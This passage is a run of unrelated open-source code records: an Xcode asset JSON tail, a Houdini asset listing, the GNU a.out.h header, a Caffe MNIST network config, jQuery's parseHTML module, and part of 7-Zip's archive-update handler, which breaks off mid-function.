\"ic_skip@2x.png\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"3x\",\n \"filename\" : \"ic_skip@3x.png\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"} {"text": "\"\"\nDialogScript\tDialogScript\nCreateScript\tCreateScript\nTypePropertiesOptions\tTypePropertiesOptions\nHelp\tHelp\nTools.shelf\tTools.shelf\nInternalFileOptions\tInternalFileOptions\nContents.gz\tContents.gz\nIconSVG\tIconSVG\nOnCreated\tOnCreated\nExtraFileOptions\tExtraFileOptions\nmops__modifier__02.svg\tmops_modifier_02.svg\n"} {"text": "#ifndef _A_OUT_H\n#define _A_OUT_H\n\n#define __GNU_EXEC_MACROS__\n\nstruct exec {\n unsigned long a_magic;\t/* Use macros N_MAGIC, etc for access */\n unsigned a_text;\t\t/* length of text, in bytes */\n unsigned a_data;\t\t/* length of data, in bytes */\n unsigned a_bss;\t\t/* length of uninitialized data area for file, in bytes */\n unsigned a_syms;\t\t/* length of symbol table data in file, in bytes */\n unsigned a_entry;\t\t/* start address */\n unsigned a_trsize;\t\t/* length of relocation info for text, in bytes */\n unsigned a_drsize;\t\t/* length of relocation info for data, in bytes */\n};\n\n#ifndef N_MAGIC\n#define N_MAGIC(exec) ((exec).a_magic)\n#endif\n\n#ifndef OMAGIC\n/* Code indicating object file or impure executable. */\n#define OMAGIC 0407\n/* Code indicating pure executable. 
*/\n#define NMAGIC 0410\n/* Code indicating demand-paged executable. */\n#define ZMAGIC 0413\n#endif /* not OMAGIC */\n\n#ifndef N_BADMAG\n#define N_BADMAG(x)\t\t\t\t\t\\\n (N_MAGIC(x) != OMAGIC && N_MAGIC(x) != NMAGIC\t\t\\\n && N_MAGIC(x) != ZMAGIC)\n#endif\n\n#define _N_BADMAG(x)\t\t\t\t\t\\\n (N_MAGIC(x) != OMAGIC && N_MAGIC(x) != NMAGIC\t\t\\\n && N_MAGIC(x) != ZMAGIC)\n\n#define _N_HDROFF(x) (SEGMENT_SIZE - sizeof (struct exec))\n\n#ifndef N_TXTOFF\n#define N_TXTOFF(x) \\\n (N_MAGIC(x) == ZMAGIC ? _N_HDROFF((x)) + sizeof (struct exec) : sizeof (struct exec))\n#endif\n\n#ifndef N_DATOFF\n#define N_DATOFF(x) (N_TXTOFF(x) + (x).a_text)\n#endif\n\n#ifndef N_TRELOFF\n#define N_TRELOFF(x) (N_DATOFF(x) + (x).a_data)\n#endif\n\n#ifndef N_DRELOFF\n#define N_DRELOFF(x) (N_TRELOFF(x) + (x).a_trsize)\n#endif\n\n#ifndef N_SYMOFF\n#define N_SYMOFF(x) (N_DRELOFF(x) + (x).a_drsize)\n#endif\n\n#ifndef N_STROFF\n#define N_STROFF(x) (N_SYMOFF(x) + (x).a_syms)\n#endif\n\n/* Address of text segment in memory after it is loaded. */\n#ifndef N_TXTADDR\n#define N_TXTADDR(x) 0\n#endif\n\n/* Address of data segment in memory after it is loaded.\n Note that it is up to you to define SEGMENT_SIZE\n on machines not listed here. */\n#if defined(vax) || defined(hp300) || defined(pyr)\n#define SEGMENT_SIZE PAGE_SIZE\n#endif\n#ifdef\thp300\n#define\tPAGE_SIZE\t4096\n#endif\n#ifdef\tsony\n#define\tSEGMENT_SIZE\t0x2000\n#endif\t/* Sony. */\n#ifdef is68k\n#define SEGMENT_SIZE 0x20000\n#endif\n#if defined(m68k) && defined(PORTAR)\n#define PAGE_SIZE 0x400\n#define SEGMENT_SIZE PAGE_SIZE\n#endif\n\n#define PAGE_SIZE 4096\n#define SEGMENT_SIZE 1024\n\n#define _N_SEGMENT_ROUND(x) (((x) + SEGMENT_SIZE - 1) & ~(SEGMENT_SIZE - 1))\n\n#define _N_TXTENDADDR(x) (N_TXTADDR(x)+(x).a_text)\n\n#ifndef N_DATADDR\n#define N_DATADDR(x) \\\n (N_MAGIC(x)==OMAGIC? (_N_TXTENDADDR(x)) \\\n : (_N_SEGMENT_ROUND (_N_TXTENDADDR(x))))\n#endif\n\n/* Address of bss segment in memory after it is loaded. */\n#ifndef N_BSSADDR\n#define N_BSSADDR(x) (N_DATADDR(x) + (x).a_data)\n#endif\n\n#ifndef N_NLIST_DECLARED\nstruct nlist {\n union {\n char *n_name;\n struct nlist *n_next;\n long n_strx;\n } n_un;\n unsigned char n_type;\n char n_other;\n short n_desc;\n unsigned long n_value;\n};\n#endif\n\n#ifndef N_UNDF\n#define N_UNDF 0\n#endif\n#ifndef N_ABS\n#define N_ABS 2\n#endif\n#ifndef N_TEXT\n#define N_TEXT 4\n#endif\n#ifndef N_DATA\n#define N_DATA 6\n#endif\n#ifndef N_BSS\n#define N_BSS 8\n#endif\n#ifndef N_COMM\n#define N_COMM 18\n#endif\n#ifndef N_FN\n#define N_FN 15\n#endif\n\n#ifndef N_EXT\n#define N_EXT 1\n#endif\n#ifndef N_TYPE\n#define N_TYPE 036\n#endif\n#ifndef N_STAB\n#define N_STAB 0340\n#endif\n\n/* The following type indicates the definition of a symbol as being\n an indirect reference to another symbol. The other symbol\n appears as an undefined reference, immediately following this symbol.\n\n Indirection is asymmetrical. The other symbol's value will be used\n to satisfy requests for the indirect symbol, but not vice versa.\n If the other symbol does not have a definition, libraries will\n be searched to find a definition. 
*/\n#define N_INDR 0xa\n\n/* The following symbols refer to set elements.\n All the N_SET[ATDB] symbols with the same name form one set.\n Space is allocated for the set in the text section, and each set\n element's value is stored into one word of the space.\n The first word of the space is the length of the set (number of elements).\n\n The address of the set is made into an N_SETV symbol\n whose name is the same as the name of the set.\n This symbol acts like a N_DATA global symbol\n in that it can satisfy undefined external references. */\n\n/* These appear as input to LD, in a .o file. */\n#define\tN_SETA\t0x14\t\t/* Absolute set element symbol */\n#define\tN_SETT\t0x16\t\t/* Text set element symbol */\n#define\tN_SETD\t0x18\t\t/* Data set element symbol */\n#define\tN_SETB\t0x1A\t\t/* Bss set element symbol */\n\n/* This is output from LD. */\n#define N_SETV\t0x1C\t\t/* Pointer to set vector in data area. */\n\n#ifndef N_RELOCATION_INFO_DECLARED\n\n/* This structure describes a single relocation to be performed.\n The text-relocation section of the file is a vector of these structures,\n all of which apply to the text section.\n Likewise, the data-relocation section applies to the data section. */\n\nstruct relocation_info\n{\n /* Address (within segment) to be relocated. */\n int r_address;\n /* The meaning of r_symbolnum depends on r_extern. */\n unsigned int r_symbolnum:24;\n /* Nonzero means value is a pc-relative offset\n and it should be relocated for changes in its own address\n as well as for changes in the symbol or section specified. */\n unsigned int r_pcrel:1;\n /* Length (as exponent of 2) of the field to be relocated.\n Thus, a value of 2 indicates 1<<2 bytes. */\n unsigned int r_length:2;\n /* 1 => relocate with value of symbol.\n r_symbolnum is the index of the symbol\n\t in file's the symbol table.\n 0 => relocate with the address of a segment.\n r_symbolnum is N_TEXT, N_DATA, N_BSS or N_ABS\n\t (the N_EXT bit may be set also, but signifies nothing). */\n unsigned int r_extern:1;\n /* Four bits that aren't used, but when writing an object file\n it is desirable to clear them. */\n unsigned int r_pad:4;\n};\n#endif /* no N_RELOCATION_INFO_DECLARED. 
*/\n\n\n#endif /* __A_OUT_GNU_H__ */\n"} {"text": "display: 100\naverage_loss: 40\ntest_iter: 100\ntest_interval: 500\ntest_initialization: false\nbase_lr: 0.002\ngamma: 0.1\n\nweight_decay: 0.0005\nsolver_type: RMSPROP\nrms_decay: 0.99\n\nlr_policy: \"step\"\nstepsize: 15000\nmax_iter: 50000\n\nsnapshot_prefix: \"snapshots/fitnet_mnist_ortho_SVM\"\nsolver_mode: GPU\n\n\nnet_param {\nname: \"FitNet_MNIST\"\nlayer {\n name: \"mnist\"\n type: \"Data\"\n top: \"data\"\n top: \"label\"\n include {\n phase: TRAIN\n }\n transform_param {\n scale: 0.004\n }\n data_param {\n source: '../mnist/mnist_train_lmdb'\n batch_size: 64\n backend: LMDB\n }\n}\nlayer {\n name: \"mnist\"\n type: \"Data\"\n top: \"data\"\n top: \"label\"\n include {\n phase: TEST\n }\n transform_param {\n scale: 0.004\n }\n data_param {\n source: '../mnist/mnist_test_lmdb'\n batch_size: 100\n backend: LMDB\n }\n}\nlayer {\n name: \"conv1_1a\"\n type: \"Convolution\"\n bottom: \"data\"\n top: \"conv1_1a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_1b\"\n type: \"Convolution\"\n bottom: \"data\"\n top: \"conv1_1b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_1\"\n type: \"Eltwise\"\n top: \"conv1_1\"\n bottom: \"conv1_1a\"\n bottom: \"conv1_1b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"conv1_2a\"\n type: \"Convolution\"\n bottom: \"conv1_1\"\n top: \"conv1_2a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_2b\"\n type: \"Convolution\"\n bottom: \"conv1_1\"\n top: \"conv1_2b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_2\"\n type: \"Eltwise\"\n top: \"conv1_2\"\n bottom: \"conv1_2a\"\n bottom: \"conv1_2b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"pool1\"\n type: \"Pooling\"\n bottom: \"conv1_2\"\n top: \"pool1\"\n pooling_param {\n pool: MAX\n kernel_size: 4\n stride: 2\n }\n}\nlayer {\n name: \"conv2_1a\"\n type: \"Convolution\"\n bottom: \"pool1\"\n top: \"conv2_1a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_1b\"\n type: \"Convolution\"\n bottom: \"pool1\"\n top: \"conv2_1b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_1\"\n type: \"Eltwise\"\n top: \"conv2_1\"\n bottom: \"conv2_1a\"\n bottom: \"conv2_1b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"conv2_2a\"\n type: \"Convolution\"\n bottom: 
\"conv2_1\"\n top: \"conv2_2a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_2b\"\n type: \"Convolution\"\n bottom: \"conv2_1\"\n top: \"conv2_2b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_2\"\n type: \"Eltwise\"\n top: \"conv2_2\"\n bottom: \"conv2_2a\"\n bottom: \"conv2_2b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"pool2\"\n type: \"Pooling\"\n bottom: \"conv2_2\"\n top: \"pool2\"\n pooling_param {\n pool: MAX\n kernel_size: 4\n stride: 2\n }\n}\n\nlayer {\n name: \"conv3_1a\"\n type: \"Convolution\"\n bottom: \"pool2\"\n top: \"conv3_1a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_1b\"\n type: \"Convolution\"\n bottom: \"pool2\"\n top: \"conv3_1b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_1\"\n type: \"Eltwise\"\n top: \"conv3_1\"\n bottom: \"conv3_1a\"\n bottom: \"conv3_1b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"conv3_2a\"\n type: \"Convolution\"\n bottom: \"conv3_1\"\n top: \"conv3_2a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_2b\"\n type: \"Convolution\"\n bottom: \"conv3_1\"\n top: \"conv3_2b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_2\"\n type: \"Eltwise\"\n top: \"conv3_2\"\n bottom: \"conv3_2a\"\n bottom: \"conv3_2b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"pool3\"\n type: \"Pooling\"\n bottom: \"conv3_2\"\n top: \"pool3\"\n pooling_param {\n pool: MAX\n kernel_size: 2\n stride: 2\n }\n}\nlayer {\n name: \"final_drop\"\n type: \"Dropout\"\n bottom: \"pool3\"\n top: \"final_drop\"\n dropout_param {\n dropout_ratio: 0.3\n }\n}\nlayer {\n name: \"clf\"\n type: \"InnerProduct\"\n bottom: \"final_drop\"\n top: \"clf\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n inner_product_param {\n num_output: 10\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"accuracy\"\n type: \"Accuracy\"\n bottom: \"clf\"\n bottom: \"label\"\n top: \"accuracy\"\n include {\n phase: TEST\n }\n}\nlayer {\n name: \"loss\"\n type: \"HingeLoss\"\n bottom: \"clf\"\n bottom: \"label\"\n top: \"loss\"\n hinge_loss_param {\n norm: L1\n }\n}\n}\n"} {"text": "define( [\n\t\"../core\",\n\t\"../var/document\",\n\t\"./var/rsingleTag\",\n\t\"../manipulation/buildFragment\",\n\n\t// This 
is the only module that needs core/support\n\t\"./support\"\n], function( jQuery, document, rsingleTag, buildFragment, support ) {\n\n\"use strict\";\n\n// Argument \"data\" should be string of html\n// context (optional): If specified, the fragment will be created in this context,\n// defaults to document\n// keepScripts (optional): If true, will include scripts passed in the html string\njQuery.parseHTML = function( data, context, keepScripts ) {\n\tif ( typeof data !== \"string\" ) {\n\t\treturn [];\n\t}\n\tif ( typeof context === \"boolean\" ) {\n\t\tkeepScripts = context;\n\t\tcontext = false;\n\t}\n\n\tvar base, parsed, scripts;\n\n\tif ( !context ) {\n\n\t\t// Stop scripts or inline event handlers from being executed immediately\n\t\t// by using document.implementation\n\t\tif ( support.createHTMLDocument ) {\n\t\t\tcontext = document.implementation.createHTMLDocument( \"\" );\n\n\t\t\t// Set the base href for the created document\n\t\t\t// so any parsed elements with URLs\n\t\t\t// are based on the document's URL (gh-2965)\n\t\t\tbase = context.createElement( \"base\" );\n\t\t\tbase.href = document.location.href;\n\t\t\tcontext.head.appendChild( base );\n\t\t} else {\n\t\t\tcontext = document;\n\t\t}\n\t}\n\n\tparsed = rsingleTag.exec( data );\n\tscripts = !keepScripts && [];\n\n\t// Single tag\n\tif ( parsed ) {\n\t\treturn [ context.createElement( parsed[ 1 ] ) ];\n\t}\n\n\tparsed = buildFragment( [ data ], context, scripts );\n\n\tif ( scripts && scripts.length ) {\n\t\tjQuery( scripts ).remove();\n\t}\n\n\treturn jQuery.merge( [], parsed.childNodes );\n};\n\nreturn jQuery.parseHTML;\n\n} );\n"} {"text": "// 7zHandlerOut.cpp\n\n#include \"StdAfx.h\"\n\n#include \"../../../Windows/PropVariant.h\"\n\n#include \"../../../Common/ComTry.h\"\n#include \"../../../Common/StringToInt.h\"\n\n#include \"../../ICoder.h\"\n\n#include \"../Common/ItemNameUtils.h\"\n#include \"../Common/ParseProperties.h\"\n\n#include \"7zHandler.h\"\n#include \"7zOut.h\"\n#include \"7zUpdate.h\"\n\nusing namespace NWindows;\n\nnamespace NArchive {\nnamespace N7z {\n\nstatic const wchar_t *kLZMAMethodName = L\"LZMA\";\nstatic const wchar_t *kCopyMethod = L\"Copy\";\nstatic const wchar_t *kDefaultMethodName = kLZMAMethodName;\n\nstatic const UInt32 kLzmaAlgorithmX5 = 1;\nstatic const wchar_t *kLzmaMatchFinderForHeaders = L\"BT2\";\nstatic const UInt32 kDictionaryForHeaders =\n #ifdef UNDER_CE\n 1 << 18\n #else\n 1 << 20\n #endif\n;\nstatic const UInt32 kNumFastBytesForHeaders = 273;\nstatic const UInt32 kAlgorithmForHeaders = kLzmaAlgorithmX5;\n\nstatic inline bool IsCopyMethod(const UString &methodName)\n { return (methodName.CompareNoCase(kCopyMethod) == 0); }\n\nSTDMETHODIMP CHandler::GetFileTimeType(UInt32 *type)\n{\n *type = NFileTimeType::kWindows;\n return S_OK;\n}\n\nHRESULT CHandler::SetCompressionMethod(\n CCompressionMethodMode &methodMode,\n CCompressionMethodMode &headerMethod)\n{\n HRESULT res = SetCompressionMethod(methodMode, _methods\n #ifndef _7ZIP_ST\n , _numThreads\n #endif\n );\n RINOK(res);\n methodMode.Binds = _binds;\n\n if (_compressHeaders)\n {\n // headerMethod.Methods.Add(methodMode.Methods.Back());\n\n CObjectVector headerMethodInfoVector;\n COneMethodInfo oneMethodInfo;\n oneMethodInfo.MethodName = kLZMAMethodName;\n {\n CProp prop;\n prop.Id = NCoderPropID::kMatchFinder;\n prop.Value = kLzmaMatchFinderForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n {\n CProp prop;\n prop.Id = NCoderPropID::kAlgorithm;\n prop.Value = kAlgorithmForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n 
{\n CProp prop;\n prop.Id = NCoderPropID::kNumFastBytes;\n prop.Value = (UInt32)kNumFastBytesForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n {\n CProp prop;\n prop.Id = NCoderPropID::kDictionarySize;\n prop.Value = (UInt32)kDictionaryForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n headerMethodInfoVector.Add(oneMethodInfo);\n HRESULT res = SetCompressionMethod(headerMethod, headerMethodInfoVector\n #ifndef _7ZIP_ST\n , 1\n #endif\n );\n RINOK(res);\n }\n return S_OK;\n}\n\nHRESULT CHandler::SetCompressionMethod(\n CCompressionMethodMode &methodMode,\n CObjectVector &methodsInfo\n #ifndef _7ZIP_ST\n , UInt32 numThreads\n #endif\n )\n{\n UInt32 level = _level;\n \n if (methodsInfo.IsEmpty())\n {\n COneMethodInfo oneMethodInfo;\n oneMethodInfo.MethodName = ((level == 0) ? kCopyMethod : kDefaultMethodName);\n methodsInfo.Add(oneMethodInfo);\n }\n\n bool needSolid = false;\n for(int i = 0; i < methodsInfo.Size(); i++)\n {\n COneMethodInfo &oneMethodInfo = methodsInfo[i];\n SetCompressionMethod2(oneMethodInfo\n #ifndef _7ZIP_ST\n , numThreads\n #endif\n );\n\n if (!IsCopyMethod(oneMethodInfo.MethodName))\n needSolid = true;\n\n CMethodFull methodFull;\n\n if (!FindMethod(\n EXTERNAL_CODECS_VARS\n oneMethodInfo.MethodName, methodFull.Id, methodFull.NumInStreams, methodFull.NumOutStreams))\n return E_INVALIDARG;\n methodFull.Props = oneMethodInfo.Props;\n methodMode.Methods.Add(methodFull);\n\n if (!_numSolidBytesDefined)\n {\n for (int j = 0; j < methodFull.Props.Size(); j++)\n {\n const CProp &prop = methodFull.Props[j];\n if ((prop.Id == NCoderPropID::kDictionarySize ||\n prop.Id == NCoderPropID::kUsedMemorySize) && prop.Value.vt == VT_UI4)\n {\n _numSolidBytes = ((UInt64)prop.Value.ulVal) << 7;\n const UInt64 kMinSize = (1 << 24);\n if (_numSolidBytes < kMinSize)\n _numSolidBytes = kMinSize;\n _numSolidBytesDefined = true;\n break;\n }\n }\n }\n }\n\n if (!needSolid && !_numSolidBytesDefined)\n {\n _numSolidBytesDefined = true;\n _numSolidBytes = 0;\n }\n return S_OK;\n}\n\nstatic HRESULT GetTime(IArchiveUpdateCallback *updateCallback, int index, bool writeTime, PROPID propID, UInt64 &ft, bool &ftDefined)\n{\n ft = 0;\n ftDefined = false;\n if (!writeTime)\n return S_OK;\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(index, propID, &prop));\n if (prop.vt == VT_FILETIME)\n {\n ft = prop.filetime.dwLowDateTime | ((UInt64)prop.filetime.dwHighDateTime << 32);\n ftDefined = true;\n }\n else if (prop.vt != VT_EMPTY)\n return E_INVALIDARG;\n return S_OK;\n}\n\nSTDMETHODIMP CHandler::UpdateItems(ISequentialOutStream *outStream, UInt32 numItems,\n IArchiveUpdateCallback *updateCallback)\n{\n COM_TRY_BEGIN\n\n const CArchiveDatabaseEx *db = 0;\n #ifdef _7Z_VOL\n if (_volumes.Size() > 1)\n return E_FAIL;\n const CVolume *volume = 0;\n if (_volumes.Size() == 1)\n {\n volume = &_volumes.Front();\n db = &volume->Database;\n }\n #else\n if (_inStream != 0)\n db = &_db;\n #endif\n\n CObjectVector updateItems;\n \n for (UInt32 i = 0; i < numItems; i++)\n {\n Int32 newData, newProps;\n UInt32 indexInArchive;\n if (!updateCallback)\n return E_FAIL;\n RINOK(updateCallback->GetUpdateItemInfo(i, &newData, &newProps, &indexInArchive));\n CUpdateItem ui;\n ui.NewProps = IntToBool(newProps);\n ui.NewData = IntToBool(newData);\n ui.IndexInArchive = indexInArchive;\n ui.IndexInClient = i;\n ui.IsAnti = false;\n ui.Size = 0;\n\n if (ui.IndexInArchive != -1)\n {\n if (db == 0 || ui.IndexInArchive >= db->Files.Size())\n return E_INVALIDARG;\n const CFileItem &fi = db->Files[ui.IndexInArchive];\n 
ui.Name = fi.Name;\n ui.IsDir = fi.IsDir;\n ui.Size = fi.Size;\n ui.IsAnti = db->IsItemAnti(ui.IndexInArchive);\n \n ui.CTimeDefined = db->CTime.GetItem(ui.IndexInArchive, ui.CTime);\n ui.ATimeDefined = db->ATime.GetItem(ui.IndexInArchive, ui.ATime);\n ui.MTimeDefined = db->MTime.GetItem(ui.IndexInArchive, ui.MTime);\n }\n\n if (ui.NewProps)\n {\n bool nameIsDefined;\n bool folderStatusIsDefined;\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidAttrib, &prop));\n if (prop.vt == VT_EMPTY)\n ui.AttribDefined = false;\n else if (prop.vt != VT_UI4)\n return E_INVALIDARG;\n else\n {\n ui.Attrib = prop.ulVal;\n ui.AttribDefined = true;\n }\n }\n \n // we need MTime to sort files.\n RINOK(GetTime(updateCallback, i, WriteCTime, kpidCTime, ui.CTime, ui.CTimeDefined));\n RINOK(GetTime(updateCallback, i, WriteATime, kpidATime, ui.ATime, ui.ATimeDefined));\n RINOK(GetTime(updateCallback, i, true, kpidMTime, ui.MTime, ui.MTimeDefined));\n\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidPath, &prop));\n if (prop.vt == VT_EMPTY)\n nameIsDefined = false;\n else if (prop.vt != VT_BSTR)\n return E_INVALIDARG;\n else\n {\n ui.Name = NItemName::MakeLegalName(prop.bstrVal);\n nameIsDefined = true;\n }\n }\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidIsDir, &prop));\n if (prop.vt == VT_EMPTY)\n folderStatusIsDefined = false;\n else if (prop.vt != VT_BOOL)\n return E_INVALIDARG;\n else\n {\n ui.IsDir = (prop.boolVal != VARIANT_FALSE);\n folderStatusIsDefined = true;\n }\n }\n\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidIsAnti, &prop));\n if (prop.vt == VT_EMPTY)\n ui.IsAnti = false;\n else if (prop.vt != VT_BOOL)\n return E_INVALIDARG;\n else\n ui.IsAnti = (prop.boolVal != VARIANT_FALSE);\n }\n\n if (ui.IsAnti)\n {\n ui.AttribDefined = false;\n\n ui.CTimeDefined = false;\n ui.ATimeDefined = false;\n ui.MTimeDefined = false;\n \n ui.Size = 0;\n }\n\n if (!folderStatusIsDefined && ui.AttribDefined)\n ui.SetDirStatusFromAttrib();\n }\n\n if (ui.NewData)\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidSize, &prop));\n if (prop.vt != VT_UI8)\n return E_INVALIDARG;\n ui.Size = (UInt64)prop.uhVal.QuadPart;\n if (ui.Size != 0 && ui.IsAnti)\n return E_INVALIDARG;\n }\n updateItems.Add(ui);\n }\n\n CCompressionMethodMode methodMode, headerMethod;\n RINOK(SetCompressionMethod(methodMode, headerMethod));\n #ifndef _7ZIP_ST\n methodMode.NumThreads = _numThreads;\n headerMethod.NumThreads = 1;\n #endif\n\n CMyComPtr getPassword2;\n updateCallback->QueryInterface(IID_ICryptoGetTextPassword2, (void **)&getPassword2);\n\n if (getPassword2)\n {\n CMyComBSTR password;\n Int32 passwordIsDefined;\n RINOK(getPassword2->CryptoGetTextPassword2(&passwordIsDefined, &password));\n methodMode.PasswordIsDefined = IntToBool(passwordIsDefined);\n if (methodMode.PasswordIsDefined)\n methodMode.Password = password;\n }\n else\n methodMode.PasswordIsDefined = false;\n\n bool compressMainHeader = _compressHeaders; // check it\n\n bool encryptHeaders = false;\n\n if (methodMode.PasswordIsDefined)\n {\n if (_encryptHeadersSpecified)\n encryptHeaders = _encryptHeaders;\n #ifndef _NO_CRYPTO\n else\n encryptHeaders = _passwordIsDefined;\n #endif\n compressMainHeader = true;\n if (encryptHeaders)\n {\n headerMethod.PasswordIsDefined = methodMode.PasswordIsDefined;\n headerMethod.Password = methodMode.Password;\n }\n }\n\n if (numItems < 2)\n compressMainHeader = false;\n\n CUpdateOptions options;\n options.Method = 
&methodMode;\n options.HeaderMethod = (_compressHeaders || encryptHeaders) ? &headerMethod : 0;\n options.UseFilters = _level != 0 && _autoFilter;\n options.MaxFilter = _level >= 8;\n\n options.HeaderOptions.CompressMainHeader = compressMainHeader;\n options.HeaderOptions.WriteCTime = WriteCTime;\n options.HeaderOptions.WriteATime = WriteATime;\n options.HeaderOptions.WriteMTime = WriteMTime;\n \n options.NumSolidFiles = _numSolidFiles;\n options.NumSolidBytes = _numSolidBytes;\n options.SolidExtension = _solidExtension;\n options.RemoveSfxBlock = _removeSfxBlock;\n options.VolumeMode = _volumeMode;\n\n COutArchive archive;\n CArchiveDatabase newDatabase;\n\n CMyComPtr getPassword;\n updateCallback->QueryInterface(IID_ICryptoGetTextPassword, (void **)&getPassword);\n \n HRESULT res = Update(\n EXTERNAL_CODECS_VARS\n #ifdef _7Z_VOL\n volume ? volume->Stream: 0,\n volume ? db : 0,\n #else\n _inStream,\n db,\n #endif\n updateItems,\n archive, newDatabase, outStream, updateCallback, options\n #ifndef _NO_CRYPTO\n , getPassword\n #endif\n );\n\n RINOK(res);\n\n updateItems.ClearAndFree();\n\n return archive.WriteDatabase(EXTERNAL_CODECS_VARS\n newDatabase, options.HeaderMethod, options.HeaderOptions);\n\n COM_TRY_END\n}\n\nstatic HRESULT GetBindInfoPart(UString &srcString, UInt32 &coder, UInt32 &stream)\n{\n stream = 0;\n int index = ParseStringToUInt32(srcString, coder);\n if (index == 0)\n return E_INVALIDARG;\n srcString.Delete(0, index);\n if (srcString[0] == 'S')\n {\n srcString.Delete(0);\n int index = ParseStringToUInt32(srcString, stream);\n if (index == 0)\n return E_INVALIDARG;\n srcString.Delete(0, index);\n }\n return S_OK;\n}\n\nstatic HRESULT GetBindInfo(UString &srcString, CBind &bind)\n{\n RINOK(GetBindInfoPart(srcString, bind.OutCoder, bind.OutStream));\n if (srcString[0] != ':')\n return E_INVALIDARG;\n srcString.Delete(0);\n RINOK(GetBindInfoPart(srcString, bind.InCoder, bind.InStream));\n if (!srcString.IsEmpty())\n return E_INVALIDARG;\n return S_OK;\n}\n\nSTDMETHODIMP CHandler::SetProperties(const wchar_t **names, const PROPVARIANT *values, Int32 numProperties)\n{\n COM_TRY_BEGIN\n _binds.Clear();\n BeforeSetProperty();\n\n for (int i = 0; i < numProperties; i++)\n {\n UString name = names[i];\n name.MakeUpper();\n if (name.IsEmpty())\n return E_INVALIDARG;\n\n const PROPVARIANT &value = values[i];\n\n if (name[0] == 'B')\n {\n name.Delete(0);\n CBind bind;\n RINOK(GetBindInfo(name, bind));\n _binds.Add(bind);\n continue;\n }\n\n 